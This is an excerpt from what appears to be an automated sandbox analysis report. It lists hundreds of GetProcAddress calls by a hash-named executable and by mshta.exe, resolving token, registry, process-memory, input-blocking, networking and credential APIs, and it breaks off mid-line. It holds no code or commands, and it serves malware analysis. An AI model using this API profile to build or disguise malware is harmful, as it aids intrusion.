\"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"GetProcAddress\" with a parameter LookupAccountSidW (UID: 00000000-00003064)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"GetProcAddress\" with a parameter CreateWellKnownSid (UID: 00000000-00003064)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"GetProcAddress\" with a parameter RpcBindingSetAuthInfoExW (UID: 00000000-00003064)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"GetProcAddress\" with a parameter RpcBindingFree (UID: 00000000-00003064)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"GetProcAddress\" with a parameter CscNetApiGetInterface (UID: 00000000-00003064)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"GetProcAddress\" with a parameter NetApiBufferAllocate (UID: 00000000-00003064)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"GetProcAddress\" with a parameter NetApiBufferFree (UID: 00000000-00003064)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"GetProcAddress\" with a parameter NetpwNameCanonicalize (UID: 00000000-00003064)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter HeapSetInformation (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter RtlGetDeviceFamilyInfoEnum (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter AcquireSRWLockExclusive (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter ReleaseSRWLockExclusive (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter EventSetInformation (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter CoCreateGuid (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter RegisterTraceGuidsW (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter OpenThreadToken (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter OpenProcessToken (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter AllocateAndInitializeSid (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter CheckTokenMembership (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter FreeSid (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter RegisterTraceGuidsA (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter CoInternetIsFeatureEnabled (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter RegisterApplicationRestart (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter RunHTMLApplication (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter OleInitialize (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter ThemeInitApiHook (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter IsProcessDPIAware (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter DwmIsCompositionEnabled (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter PathRemoveArgsW (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter CreateURLMonikerEx (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter CoCreateInstance (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter RaiseFailFastException (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter SetCoalescableTimer (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter IsAppThemed (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter CoInitializeEx (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter LpkEditControl (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter CoRegisterInitializeSpy (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter CoInternetCreateSecurityManager (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter GetUserNameExW (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter CoTaskMemAlloc (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter IUnknown_QueryService (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter CoTaskMemFree (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter PathCreateFromUrlW (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter SHGetFolderPathW (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter ConvertStringSidToSidW (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter SHCreateAssociationRegistration (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter CoInternetGetSession (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter CoInternetParseIUri (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter SHStrDupW (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter InitializeSRWLock (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter AcquireSRWLockShared (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter ReleaseSRWLockShared (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter CoInternetIsFeatureEnabledForUrl (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter ReleaseBindInfo (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter FindMimeFromData (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter CoWaitForMultipleHandles (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter LookupAccountSidLocalW (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter RegisterTouchHitTestingWindow (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter CoUninitialize (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter CoRevokeInitializeSpy (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter GetTokenInformation (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter EqualSid (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter EventWrite (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter EventRegister (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter EventUnregister (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter LresultFromObject (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter GetGUIThreadInfo (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter GetAccCursorInfo (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter GetCursorInfo (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter GetWindowInfo (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter GetTitleBarInfo (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter GetScrollBarInfo (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter GetComboBoxInfo (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter GetAncestor (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter RealChildWindowFromPoint (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter RealGetWindowClassW (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter GetAltTabInfoW (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter GetListBoxInfo (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter GetMenuBarInfo (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter SendInput (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter BlockInput (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter LogicalToPhysicalPoint (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter PhysicalToLogicalPoint (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter WindowFromPhysicalPoint (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter GetPhysicalCursorPos (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter GetModuleFileNameW (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter VirtualAllocEx (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter VirtualFreeEx (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter NtQueryInformationProcess (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter NtAllocateVirtualMemory (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter NtFreeVirtualMemory (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter SystemFunction036 (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter SxsOleAut32MapIIDToProxyStubCLSID (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter RegQueryValueW (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter ObjectFromLresult (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter MsimtfIsWindowFiltered (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter GetLayout (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter GdiRealizationInfo (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter FontIsLinked (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter RegOpenKeyExW (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter RegQueryInfoKeyW (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter GetTextFaceAliasW (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter RegEnumValueW (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter RegCloseKey (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter RegQueryValueExW (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter GetFontAssocStatus (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter RegQueryValueExA (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter RegEnumKeyExW (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter GdiIsMetaPrintDC (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter IsWindowRedirectedForPrint (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter DWriteCreateFactory (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter CreateDXGIFactory1 (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter D3DKMTOpenAdapterFromGdiDisplayName (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter D3DKMTCloseAdapter (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter D3DKMTQueryAdapterInfo (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter D3DKMTOpenAdapterFromDeviceName (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter SetupDiGetClassDevsW (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter SetupDiEnumDeviceInterfaces (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter SetupDiGetDeviceInterfaceDetailW (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter SetupDiDestroyDeviceInfoList (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter SetupDiGetDevicePropertyW (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter WinVerifyTrust (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter D3DKMTGetDisplayModeList (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter D3DKMTSetVidPnSourceOwner (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter D3DKMTSetDisplayMode (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter D3DKMTSetGammaRamp (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter D3DKMTGetDeviceState (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter D3DKMTWaitForVerticalBlankEvent (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter D3DKMTCreateDCFromMemory (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter D3DKMTDestroyDCFromMemory (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter D3DKMTCheckVidPnExclusiveOwnership (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter D3DKMTCheckMonitorPowerState (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter D3DKMTCheckSharedResourceAccess (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter GetUserNameExA (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter GetSidSubAuthorityCount (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter GetSidSubAuthority (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter RegCreateKeyExA (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter RegGetValueW (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter RegSetValueExW (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter SHGetKnownFolderPath (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter CopySid (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter ConvertSidToStringSidW (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter ConvertStringSecurityDescriptorToSecurityDescriptorW (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter SHCreateStreamOnFileW (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter CreateXmlReader (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter CreateDXGIFactory (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter CheckETWTLS (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter D3D11CreateDevice (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter CompatValue (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter D3DKMTGetThunkVersion (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter D3DKMTSetQueuedLimit (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter D3DKMTGetMultisampleMethodList (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter D3DKMTSetDisplayPrivateDriverFormat (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter D3DKMTDestroySynchronizationObject (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter D3DKMTCreateSynchronizationObject (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter D3DKMTDestroyContext (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter D3DKMTCreateContext (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter D3DKMTGetContextSchedulingPriority (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter D3DKMTSetContextSchedulingPriority (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter D3DKMTPresent (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter D3DKMTDestroyDevice (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter D3DKMTCreateDevice (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter D3DKMTQueryAllocationResidency (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter D3DKMTSetAllocationPriority (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter D3DKMTDestroyAllocation (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter D3DKMTOpenResource (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter D3DKMTQueryResourceInfo (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter D3DKMTCreateAllocation (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter D3DKMTSignalSynchronizationObject (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter D3DKMTWaitForSynchronizationObject (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter D3DKMTEscape (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter D3DKMTUnlock (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter D3DKMTLock (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter D3DKMTRender (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter OpenAdapter10_2 (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter CoInternetCombineUrl (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter ResolveDelayLoadedAPI (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter InitCommonControlsEx (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter CoInternetParseUrl (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter CreateBindCtx (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter MkParseDisplayName (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter RegCreateKeyExW (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter EtwRegisterTraceGuidsW (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter DuplicateTokenEx (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter CoCreateFreeThreadedMarshaler (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter CoInternetCombineIUri (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter GetUrlCacheEntryInfoExW (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter EventEnabled (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter GetThreadPreferredUILanguages (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter SetThreadPreferredUILanguages (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter LocaleNameToLCID (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter GetLocaleInfoEx (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter LCIDToLocaleName (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter GetSystemDefaultLocaleName (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter BindMoniker (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter SxsOleAut32RedirectTypeLibrary (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter RegOpenKeyW (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter RegEnumKeyW (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter SxsOleAut32MapConfiguredClsidToReferenceClsid (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter PSCreateMemoryPropertyStore (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter GetUrlCacheEntryBinaryBlob (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter ShouldShowIntranetWarningSecband (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter CryptStringToBinaryW (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter GetThemeEnumValue (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter GetThemeBitmap (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter GetThemeInt (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter GetThemeMargins (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter GetThemePosition (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter PropVariantClear (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter RegisterDragDrop (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter GetCurrentInputMessageSource (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter GetModuleHandleW (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter DllCanUnloadNow (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter IEDllLoader (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter CoInternetCreateZoneManager (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter CopyBindInfo (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter CreateURLMoniker (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter RegisterBindStatusCallback (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter RevokeBindStatusCallback (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter UrlMkGetSessionOption (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter CreateUri (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter CoInternetGetSecurityUrl (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter IsValidURL (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter InternetCrackUrlW (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter InternetCreateUrlW (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter RegGetValueA (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter RegOpenKeyExA (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter WinHttpCreateProxyResolver (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter EventActivityIdControl (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter WSAIoctl (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter GetBestInterfaceEx (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter GetIfEntry2 (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter SHGetValueA (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter RegDeleteValueW (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter DnsGetProxyInformation (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter GetAdaptersAddresses (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter GetAddrInfoW (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter NotifyIpInterfaceChange (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter DhcpRequestParams (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter NotifyUnicastIpAddressChange (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter ConvertInterfaceGuidToLuid (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter GetIpForwardTable2 (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter GetIpNetEntry2 (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter FreeMibTable (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter StringFromIID (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter CoSetProxyBlanket (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter ObjectStublessClient10 (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter GetAddrInfoExW (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter QueryActCtxW (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter GetModuleHandleExW (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter CreateActCtxW (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter ActivateActCtx (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter FindActCtxSectionStringW (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter DeactivateActCtx (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter getaddrinfo (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter getnameinfo (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter freeaddrinfo (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter WSASocketA (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter WSASend (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter WSARecv (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter CertOpenStore (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter GetUserProfileDirectoryW (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter EnumerateSecurityPackagesA (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter AcquireCredentialsHandleA (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter FreeContextBuffer (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter CertDuplicateStore (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter CertControlStore (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter CertCloseStore (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter InitializeSecurityContextA (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter SslOpenProvider (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter GetHashInterface (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter SslIncrementProviderReferenceCount (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter SslImportKey (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter GetCipherInterface (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter QueryContextAttributesA (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter CertDuplicateCertificateContext (UID: 00000000-00003044)\n \"mshta.exe\" called 